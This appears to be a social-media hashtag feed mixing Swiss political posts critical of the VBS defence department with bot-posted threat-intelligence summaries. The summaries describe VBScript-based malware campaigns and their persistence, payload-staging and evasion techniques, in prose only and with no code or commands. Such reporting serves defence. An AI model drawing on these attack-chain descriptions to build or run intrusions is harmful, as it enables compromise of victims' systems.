...to whom it may concern:

#CH #Politik #Landesverteidigung #Armee #VBS #armasuisse

https://bsky.app/profile/antongerashchenko.bsky.social/post/3mihnwgppic2d

WhatsApp malware campaign delivers VBScript and MSI backdoors

Pulse ID: 69cca0d42a45dcf14f2ec56a
Pulse Link: https://otx.alienvault.com/pulse/69cca0d42a45dcf14f2ec56a
Pulse Author: Tr1sa111
Created: 2026-04-01 04:36:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #VBS #WhatsApp #bot #Tr1sa111

Operation DualScript: Multi-Stage PowerShell Malware Targets Crypto

Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activities. It utilizes Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while minimizing disk artifacts. The attack operates through two parallel chains: a web-based PowerShell loader deploying a cryptocurrency clipboard hijacker, and a secondary chain executing the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs various anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. This campaign highlights the growing abuse of trusted system utilities and in-memory execution techniques to evade traditional detection mechanisms.

Pulse ID: 69cb7349f3c70800ebef7310
Pulse Link: https://otx.alienvault.com/pulse/69cb7349f3c70800ebef7310
Pulse Author: AlienVault
Created: 2026-03-31 07:10:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Clipboard #CyberSecurity #InfoSec #Malware #Nim #OTX #OpenThreatExchange #PowerShell #RAT #Rust #SMS #VBS #Windows #bot #cryptocurrency #AlienVault

WhatsApp malware campaign delivers VBScript and MSI backdoors

A sophisticated malware campaign targeting WhatsApp users has been observed since February 2026. The attack chain begins with malicious Visual Basic Script files sent via WhatsApp messages, which, when executed, initiate a multi-stage infection process. The malware uses renamed Windows utilities, retrieves payloads from trusted cloud services, and installs malicious MSI packages. The campaign employs social engineering, stealth techniques, and cloud-based payload hosting to establish persistence and escalate privileges on victim systems. The attackers utilize legitimate tools and trusted platforms to reduce visibility and increase the likelihood of successful execution. The final stage involves the delivery of unsigned MSI installers that enable remote access to compromised systems.

Pulse ID: 69cbf7d8bafcc9a4dafa7cb2
Pulse Link: https://otx.alienvault.com/pulse/69cbf7d8bafcc9a4dafa7cb2
Pulse Author: AlienVault
Created: 2026-03-31 16:35:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Cloud #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Rust #SocialEngineering #VBS #WhatsApp #Windows #bot #AlienVault

...die spinnen!

#VBS noch mehr Geld, um #us Kriegsverbrechen zu finanzieren

https://www.srf.ch/news/dialog/umstrittener-ruestungskauf-desastroese-bewertung-fuer-die-kuenftige-pistole-der-schweizer-armee

#VBS #us #ch #politik #Landesverteidigung #Armee #beschaffungswesen #lobbyismus #korruption #F35 #Patriot

Tracing a Multi-Vector Malware Campaign: From VBS to Open Infrastructure

Pulse ID: 69c30b0b082da4224d114e3d
Pulse Link: https://otx.alienvault.com/pulse/69c30b0b082da4224d114e3d
Pulse Author: Tr1sa111
Created: 2026-03-24 22:07:07

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #VBS #bot #Tr1sa111

Tracing a Multi-Vector Malware Campaign: From VBS to Open Infrastructure

A multi-stage malware delivery campaign was uncovered, initially detected through a suspicious VBS file. The investigation revealed a complex attack infrastructure using Unicode obfuscation, PNG-based payload staging, and reflectively loaded .NET execution. The attacker utilized open directories to host multiple obfuscated VBS files, each mapping to different malware payloads including XWorm and Remcos RAT. A secondary infection vector involving a weaponized 'PDF' and batch script was also discovered. The campaign demonstrated a modular approach, allowing for payload rotation and multiple attack vectors from the same domain. This sophisticated infrastructure design enables rapid modification and expansion of available payloads without altering the initial delivery mechanism.

Pulse ID: 69c2502fe450207e3f4855c3
Pulse Link: https://otx.alienvault.com/pulse/69c2502fe450207e3f4855c3
Pulse Author: AlienVault
Created: 2026-03-24 08:49:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #NET #OTX #OpenThreatExchange #PDF #RAT #Remcos #RemcosRAT #VBS #Worm #XWorm #bot #AlienVault

From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.

Pulse ID: 69bbd761dff7b64814123d3f
Pulse Link: https://otx.alienvault.com/pulse/69bbd761dff7b64814123d3f
Pulse Author: AlienVault
Created: 2026-03-19 11:00:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CAPTCHA #Cloud #CyberSecurity #Google #InfoSec #Mac #OTX #OpenThreatExchange #PowerShell #RCE #Rust #ScreenConnect #VBS #bot #AlienVault